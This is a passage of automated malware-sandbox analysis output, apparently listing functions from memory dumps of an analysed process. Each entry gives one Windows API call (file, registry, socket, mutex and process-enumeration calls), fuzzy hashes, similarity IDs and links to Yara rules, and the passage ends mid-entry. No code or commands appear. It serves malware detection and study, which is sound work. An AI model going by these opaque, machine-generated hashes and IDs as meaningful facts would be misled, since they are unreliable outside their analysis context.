Opcode Fuzzy Hash: ed4cfda8462ec963085714941e6745c064cbcafd60b59bd87d672838783cee85
Instruction Fuzzy Hash: 2931B572004340AFF722CF11DC45FA6FFB8EF05714F04459EEA859B592D2A5A949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003D07F4, Relevance: 1.6, APIs: 1, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 003D0899

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a9ca3bd2155e1f9613cd855962b7cf409a4315ec76d515bc0578b7ffb5ef94b6
Instruction ID: 62374741040f2531773a436557ef651f42ecf49663b01797a55eea3a046fe9c3
Opcode Fuzzy Hash: a9ca3bd2155e1f9613cd855962b7cf409a4315ec76d515bc0578b7ffb5ef94b6
Instruction Fuzzy Hash: BE316F71505340AFE722CB65DC44F66BFE8EF05610F0884AEE9858B252D265E909DB71

Uniqueness

Uniqueness Score: -1.00%

Function 001CAA02, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E40), ref: 001CAAB1

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 4a2134c1a614ae496b5eddbf39028c9d9e44d1e0ec8ede8d777e25ca3ae00916
Instruction ID: 0aa28bc4ba0240b4259ff0057445aa63de7ddd9163ee9abb19a2f9f6dc868e03
Opcode Fuzzy Hash: 4a2134c1a614ae496b5eddbf39028c9d9e44d1e0ec8ede8d777e25ca3ae00916
Instruction Fuzzy Hash: A431B172544384AFE722CF25CC45FA7BFACEF05710F0885ABE9858B192D265E909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 003D2720, Relevance: 1.6, APIs: 1, Instructions: 89timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E40,BA1810FE,00000000,00000000,00000000,00000000), ref: 003D27BD

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 5a61408885a5639b494ee90f48bcb6d3e8c896f90a834089e00426d4a616aec1
Instruction ID: ab010d28e6555e8b9bba19cacb45100698d792f9632a46be5cfeec4a56d5ed77
Opcode Fuzzy Hash: 5a61408885a5639b494ee90f48bcb6d3e8c896f90a834089e00426d4a616aec1
Instruction Fuzzy Hash: 1831F7B2505380AFE7128F24DC45FA6BFB8EF16310F0885DBE984CB193D2219905DB71

Uniqueness

Uniqueness Score: -1.00%

Function 003D0FB9, Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNELBASE(?,00000E40,BA1810FE,00000000,00000000,00000000,00000000), ref: 003D105C

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: 3b63c6d4b5e7309d12647131c90cd438bf8acf48aa2972cd08514030be129419
Instruction ID: 20ba7ead01c93ccae0cdfc22abd3343a7c60a5a060f4094d34493de7d2742b77
Opcode Fuzzy Hash: 3b63c6d4b5e7309d12647131c90cd438bf8acf48aa2972cd08514030be129419
Instruction Fuzzy Hash: 9D31E3725093C4AFE712CB24DC45FA6BFA8EF46310F0985DBE984CF193D625A948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003D00F6, Relevance: 1.6, APIs: 1, Instructions: 89synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 003D019D

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: c079419b3618b436f62778c5a8706fdad04476746f877dbcadfba4c1b18599c3
Instruction ID: c2396da9c7cf665a50fdf83c711a11c058dfd68e3ec6285f947d9e612fe84079
Opcode Fuzzy Hash: c079419b3618b436f62778c5a8706fdad04476746f877dbcadfba4c1b18599c3
Instruction Fuzzy Hash: 3A31AF75509380AFE712CB65DC85B56BFF8EF06310F09849BE9848B292D375A908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001CAAF9, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,BA1810FE,00000000,00000000,00000000,00000000), ref: 001CABB4

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 6aee6fa1792247c027c80a9bc8ae595f43a0e49fe9398135e767346c6dffcb1d
Instruction ID: 56dac25f1f0f5c53f1faf7364476c8ab197efff5fe6118a6865bd7d829aa8e1e
Opcode Fuzzy Hash: 6aee6fa1792247c027c80a9bc8ae595f43a0e49fe9398135e767346c6dffcb1d
Instruction Fuzzy Hash: C031B375109384AFE722CB25CC44FA2BFB8EF06314F0885DEE985CB192D260E948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003D2B83, Relevance: 1.6, APIs: 1, Instructions: 87COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000E40,BA1810FE,00000000,00000000,00000000,00000000), ref: 003D2C29

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 64ed2ea3ed40e3c88cc04401d7b6022a1c1ebc2a0e6dce85096df903473ed664
Instruction ID: f33711000d0fd941eea8405abe46257e177afe23ebe6072caaf278b407f32194
Opcode Fuzzy Hash: 64ed2ea3ed40e3c88cc04401d7b6022a1c1ebc2a0e6dce85096df903473ed664
Instruction Fuzzy Hash: F4319171509380AFE722CB25DC54B97BFB8EF06310F0985DAE9848B1A3D225A908C771

Uniqueness

Uniqueness Score: -1.00%

Function 003D04AB, Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,BA1810FE,00000000,00000000,00000000,00000000), ref: 003D055C

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: c321e17596f2e397b2fa8a7fc1e3706fae28bcd95204aec4d84c87387a577583
Instruction ID: 180c88008ec37a166b8f8fe78e747d9afd416ac72a797236d41f1406f0c5998e
Opcode Fuzzy Hash: c321e17596f2e397b2fa8a7fc1e3706fae28bcd95204aec4d84c87387a577583
Instruction Fuzzy Hash: 8E31A272509380AFE722CB65DC44F92BFB8AF06710F0985DAE9858B192D265E908CB71

Uniqueness

Uniqueness Score: -1.00%

Function 001CA120, Relevance: 1.6, APIs: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E40,?,?), ref: 001CA1C2

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: de67c47e0842e58256401b402c441f68430a10b7e9a5de7179f5b60ff6ad2258
Instruction ID: e1688b382b943580d285ed8e96506ef5f9578f85de64dede53401d38a8ba10ab
Opcode Fuzzy Hash: de67c47e0842e58256401b402c441f68430a10b7e9a5de7179f5b60ff6ad2258
Instruction Fuzzy Hash: AD31B47180D3C06FD3038B358C55B66BFB4EF47620F1981CBD8848F693D229A919CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 003D2F78, Relevance: 1.6, APIs: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E40,?,?), ref: 003D301A

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 0f922b70d3e32d38a547b402bfab2a7c562fb9e9f761e89abe61c1fcc5ed218f
Instruction ID: 08eb4221c01a601af78d452445e5bc172be610378e107e9f0121c35cdf3f37b8
Opcode Fuzzy Hash: 0f922b70d3e32d38a547b402bfab2a7c562fb9e9f761e89abe61c1fcc5ed218f
Instruction Fuzzy Hash: DC21C77154D3C45FD312CB659C51B66BFB4EF47610F0981DBD8848F2A3D224A919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 003D2D8D, Relevance: 1.6, APIs: 1, Instructions: 80networkCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,00000E40,BA1810FE,00000000,00000000,00000000,00000000), ref: 003D2E22

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: Send
String ID:
API String ID: 121738739-0
Opcode ID: 3bbbec12b1a4c6fddfe0bc5e7de065ca741ddc3c021111cfcec3e19c069764af
Instruction ID: 1b222796398f9a93b2568d69289372d518715f6f0c2aa594fceb72623e9e1c57
Opcode Fuzzy Hash: 3bbbec12b1a4c6fddfe0bc5e7de065ca741ddc3c021111cfcec3e19c069764af
Instruction Fuzzy Hash: 2321E272400344AFEB228F55DC44FA7BFACEF45310F0489AAE9859B152D235E909DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 003D0EDE, Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,00000E40), ref: 003D0F5B

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 880f64382cdce34d02c5d5e63fc0d6a861a363e2f7b1fe6799e90381061f1c82
Instruction ID: 76fef5893b5fbfad2940e409e64b09ba8aa30fa31303724230d1aa52a1a1a02a
Opcode Fuzzy Hash: 880f64382cdce34d02c5d5e63fc0d6a861a363e2f7b1fe6799e90381061f1c82
Instruction Fuzzy Hash: C121C172500304AFFB218F65DC44F6AFBACEF04720F14896BE945CA641D670E9449BA1

Uniqueness

Uniqueness Score: -1.00%

Function 003D22C4, Relevance: 1.6, APIs: 1, Instructions: 80fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 003D2366

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: a451ac9439dc3cd63019a89e31237917c4cf5637d97afe20b5bd0cd9df74329d
Instruction ID: 5c1e1372fee39b72234c4133a26c199371df726a63412f744a33f0c207c2beaf
Opcode Fuzzy Hash: a451ac9439dc3cd63019a89e31237917c4cf5637d97afe20b5bd0cd9df74329d
Instruction Fuzzy Hash: 15217E72505384AFE722CB55DC45F96FFF8EF05310F0485AEE9888B292D375A908CB65

Uniqueness

Uniqueness Score: -1.00%

Function 003D02AB, Relevance: 1.6, APIs: 1, Instructions: 79registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,00000E40), ref: 003D0353

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 54cfa80c7e34985926ddc5facaad6be9cc72973e05f3150ce6b2cf640885fa20
Instruction ID: 8e64ee1e45350b4162592a786fc6ebc070617a6f61c008124675becf0092c7bc
Opcode Fuzzy Hash: 54cfa80c7e34985926ddc5facaad6be9cc72973e05f3150ce6b2cf640885fa20
Instruction Fuzzy Hash: DC21B576009380AFE7228F11DC45FA6FFB4EF06710F0985DAE9848B1A2D265A949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 003D08F0, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E40,BA1810FE,00000000,00000000,00000000,00000000), ref: 003D0985

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 0f3b552eab7f1f95d08bc0ef87cc758357387daa58bdb1689d944eb5838c19ff
Instruction ID: ce472c245428c357a01c3432681f1cdb9d1ca726591ac835ace54e6317ae9884
Opcode Fuzzy Hash: 0f3b552eab7f1f95d08bc0ef87cc758357387daa58bdb1689d944eb5838c19ff
Instruction Fuzzy Hash: F62107B6408784AFF7138B159C41FA3BFB8EF46720F0981DBE9848B193D264A909C771

Uniqueness

Uniqueness Score: -1.00%

Function 003D21D2, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 003D225D

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 59cee343c6771074730ac19ca8dcd7996ab944e39dac3fb173035a7bb36c4c9d
Instruction ID: b393ea5ca68ee5638674a990c2464dcbe43121376a4f3532e36c8b362813feaf
Opcode Fuzzy Hash: 59cee343c6771074730ac19ca8dcd7996ab944e39dac3fb173035a7bb36c4c9d
Instruction Fuzzy Hash: 0F2181B2505380AFE722CB65DC45F66FFE8EF05310F0884AAE9848B692D375E904CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003D1A72, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 003D1AFE

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 88331b6e22242e8f1e503f4d9d07621286dd9fc13eefd05bf93ea11ce4ef3009
Instruction ID: e24e1053b96161547dfc79392b7b3c1dd8a261167dd89c1a90cb5bb2a2f0bafd
Opcode Fuzzy Hash: 88331b6e22242e8f1e503f4d9d07621286dd9fc13eefd05bf93ea11ce4ef3009
Instruction Fuzzy Hash: 5F218D72505380AFE722CF65DC45F96FFB8EF05320F08849EE9858B692D375A918CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003D05B0, Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(?,00000E40,?,?), ref: 003D064E

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 16647d091cfda534c36da07eb3dff80b4f2920546c97b747bd9c5c4fa96f912b
Instruction ID: 97774a4a0eb7db5a67619ea0ee586b3df9863c12b2c520610c9b868fa54c7fd4
Opcode Fuzzy Hash: 16647d091cfda534c36da07eb3dff80b4f2920546c97b747bd9c5c4fa96f912b
Instruction Fuzzy Hash: 0C21AF7540E3C06FD3128B259C55B62BFB4EF47610F1A81CBD8848F6A3D225A919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 003D2E86, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32(?,00000E40,BA1810FE,00000000,00000000,00000000,00000000), ref: 003D2F16

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: Recv
String ID:
API String ID: 4192927123-0
Opcode ID: ecc3e4cc2747c79a3353006482f34878b157717f6b592f77215febff2e63aaba
Instruction ID: bc8d7299dd75510491f8b03e0dd9f14ab2c964647b9274ae006bf3e09f0db161
Opcode Fuzzy Hash: ecc3e4cc2747c79a3353006482f34878b157717f6b592f77215febff2e63aaba
Instruction Fuzzy Hash: 6221A172404344AFEB228F55DC44FA7FBB8EF05310F04899BEA898B552D234E908CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 003D081A, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 003D0899

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d6021fb1d879b56c09a2e78a7ac3e9ca4cbe57547da6236303f807173cec8393
Instruction ID: 7f9f6bf725214e5cc63a57a1cb34eb01b6270c44678320a779b199faafe43209
Opcode Fuzzy Hash: d6021fb1d879b56c09a2e78a7ac3e9ca4cbe57547da6236303f807173cec8393
Instruction Fuzzy Hash: 33218E72500300AFF725DF65EC45B66FBE8EF08710F14846EE9898B651D371E904DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 003D0B79, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNEL32(?,00000E40,BA1810FE,00000000,00000000,00000000,00000000), ref: 003D0C10

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: d04b108e69a6f150c2263d44c1ece57cdbcb4314a9be386032649a431883c21d
Instruction ID: 51a72aa1113b0c7e4f528250c087ea84258fe6775039fb8574ad2de2ce478402
Opcode Fuzzy Hash: d04b108e69a6f150c2263d44c1ece57cdbcb4314a9be386032649a431883c21d
Instruction Fuzzy Hash: B921AFB6504740AFE7228F15DC85F67BFB8EF05710F08859BE9899B292D264E908CB71

Uniqueness

Uniqueness Score: -1.00%

Function 003D03CA, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,00000E40), ref: 003D045E

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 6c896a9fa91a2efa85fbebac0860088760deb442562ce393a7db4791baa5ebb5
Instruction ID: e4f9d2b82f9cb116fbc3bf1e270e3d0f76f3545d9d06d7f27dd1c674728018ad
Opcode Fuzzy Hash: 6c896a9fa91a2efa85fbebac0860088760deb442562ce393a7db4791baa5ebb5
Instruction Fuzzy Hash: C421F272100300AFFB22DF15DC81FB6FBACEF04710F00855AEA499A681D6B1A949CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 003D09C0, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E40,BA1810FE,00000000,00000000,00000000,00000000), ref: 003D0A51

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 8783aec797bdb3de4cacdfdce03c0c61404bfd95cb07f0b729231d8e1428bf14
Instruction ID: 7a457d734a8dcd0e3d719cc078e997ab8ff666f004b2d0f4cde2604c0295f5ae
Opcode Fuzzy Hash: 8783aec797bdb3de4cacdfdce03c0c61404bfd95cb07f0b729231d8e1428bf14
Instruction Fuzzy Hash: F221C472409380AFE722CF54DC44F56BFB8EF06710F0985DBE9848B193C225A909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 001CAA32, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E40), ref: 001CAAB1

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 83e7d01256d34c666e921f7ffe4fda8aee0b67eaf3512328538b0c3c3d72275a
Instruction ID: 8bba042bae0b7f9823a12c41fc443bca057c7aa8706bdc95a0d2000106aa84a7
Opcode Fuzzy Hash: 83e7d01256d34c666e921f7ffe4fda8aee0b67eaf3512328538b0c3c3d72275a
Instruction Fuzzy Hash: 8E21AE72500304AFF721CF55DD85FABFBACEF14324F04855AEA458B681D670E948CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 003D012A, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 003D019D

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 812cc221c2dcc3ff4062fd58c83658afc7db99ee2afd52d6f25b4d56e62cee62
Instruction ID: 0ae37251b36426d59542754dab70277e2be9dd03e7aba70360a4af882e6c3303
Opcode Fuzzy Hash: 812cc221c2dcc3ff4062fd58c83658afc7db99ee2afd52d6f25b4d56e62cee62
Instruction Fuzzy Hash: C3218E76601340AFF725CF65EC85B6AFBE8EF04750F0484AAE9498B741D375E904CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003D0723, Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 003D079F

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: a672d1aa4f22dd14190bad0f565de689b9eb6db6f07613aa613369c2cc5a3be5
Instruction ID: 43314be0da13ea3a2b386c386f044e3a1e922ae062cb7e0e3d05da3e60e1aad1
Opcode Fuzzy Hash: a672d1aa4f22dd14190bad0f565de689b9eb6db6f07613aa613369c2cc5a3be5
Instruction Fuzzy Hash: 3F21A1765093809FD712CB25DC85B52BFE8EF02610F0984EAE944CF253D224E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003D10BF, Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNELBASE(?,00000E40), ref: 003D114B

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 76ab2a6ef152e5e937e0974fea390f92afdf85e171035f02f89c1125dabc3070
Instruction ID: 4c4d8b1b0a865dd4570763080ce6d11a0701d564462ea69503f7b11b75ead8c3
Opcode Fuzzy Hash: 76ab2a6ef152e5e937e0974fea390f92afdf85e171035f02f89c1125dabc3070
Instruction Fuzzy Hash: 1E21E772605380BFE721CB15DC45FA6FFA8EF01720F1481DAFE488B192D3A5A948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003D0A9B, Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?), ref: 003D0B1E

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 1f076a7cf80727fa61b3cd628dd396fe93a8731f53ac7080d5398e141005c634
Instruction ID: d18b6a2f53eaefb82d6c01ed92fea71d0509bd7e62ca0e10d3eb982b812754e4
Opcode Fuzzy Hash: 1f076a7cf80727fa61b3cd628dd396fe93a8731f53ac7080d5398e141005c634
Instruction Fuzzy Hash: A12192B26093805FEB22CB25DC55B52BFA8EF16714F0981EBE984CB253D665D808CB71

Uniqueness

Uniqueness Score: -1.00%

Function 001CAB3A, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,BA1810FE,00000000,00000000,00000000,00000000), ref: 001CABB4

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 3cc675c5cef228b1b7b80eaa962ff2e011d5e50eeb7833a0f426bee033dc2241
Instruction ID: a7678ea3ce77d5457ab054b951684825ca5f03d9eb2d0675faf641a887558204
Opcode Fuzzy Hash: 3cc675c5cef228b1b7b80eaa962ff2e011d5e50eeb7833a0f426bee033dc2241
Instruction Fuzzy Hash: DC216A76600308AFE721CE15DC85F66FBA8EF14714F0485AAE9498B691D760ED48CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 003D21F2, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 003D225D

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 7a6ed97c0bce0abd000dd4a5ee32bb1a48caaee7f10edc694784a561bf5e453b
Instruction ID: 07e53bb840e92bf4657935d1482543f9e8532e86f801216376509372a5bb34dc
Opcode Fuzzy Hash: 7a6ed97c0bce0abd000dd4a5ee32bb1a48caaee7f10edc694784a561bf5e453b
Instruction Fuzzy Hash: 62219D72500340AFF761CB65EC85B66FBA8EB08320F1488AAE9488B641D375E904CA61

Uniqueness

Uniqueness Score: -1.00%

Function 003D2DB2, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,00000E40,BA1810FE,00000000,00000000,00000000,00000000), ref: 003D2E22

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: Send
String ID:
API String ID: 121738739-0
Opcode ID: c926c95e60d2701a66c93526f284d83f0db4e4c4d1a8c542c5ad173ecc5fa697
Instruction ID: 7b6ac4b87095008dfef5805b60f51510cede7e20064ff2eaeebca8c60e2676ea
Opcode Fuzzy Hash: c926c95e60d2701a66c93526f284d83f0db4e4c4d1a8c542c5ad173ecc5fa697
Instruction Fuzzy Hash: A811A272500304AFEB21CF55DC44FABFBACEF04310F0489AAEA499A641D675E5449BB1

Uniqueness

Uniqueness Score: -1.00%

Function 003D1A92, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 003D1AFE

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 6fc4ea0904cd8845949107e2c7c104447d5d8caa73331e7575d60522bacb79fb
Instruction ID: 8f203e3bf5e1d637d116775942fa85c217c892a5d8b3521cbc3e5335b9165308
Opcode Fuzzy Hash: 6fc4ea0904cd8845949107e2c7c104447d5d8caa73331e7575d60522bacb79fb
Instruction Fuzzy Hash: 3C21A172501340AFF721CF55EC45F66FBE8EF08320F04846EE9498A651D375A954DB61

Uniqueness

Uniqueness Score: -1.00%

Function 003D22F2, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 003D2366

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 32359ba0c6645132134adf2b77cca587460499b919028f370189c7ccb8a885b1
Instruction ID: db6b20ca13954e8cbbd2763df667659d7697c759f3eb5756c0f0bd756b11e874
Opcode Fuzzy Hash: 32359ba0c6645132134adf2b77cca587460499b919028f370189c7ccb8a885b1
Instruction Fuzzy Hash: 36218B76500304AFF722CF55DC45BAAFBE8EB08310F0485AAE9898B641D275E9048B61

Uniqueness

Uniqueness Score: -1.00%

Function 003D15E5, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32 ref: 003D1656

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 179c059cfbba72653b7d8a2e00f360a3f4b2bf375a9e181c5192ebc13c7b3520
Instruction ID: ed91ab002a8b76fcde8ea337870472fec71b3c33d433a485adcf1e4f88e63e38
Opcode Fuzzy Hash: 179c059cfbba72653b7d8a2e00f360a3f4b2bf375a9e181c5192ebc13c7b3520
Instruction Fuzzy Hash: 6D2150765093849FD712CB25DC45B92BFE4EF06320F0984EBE985CB263D275E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003D0B9E, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNEL32(?,00000E40,BA1810FE,00000000,00000000,00000000,00000000), ref: 003D0C10

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
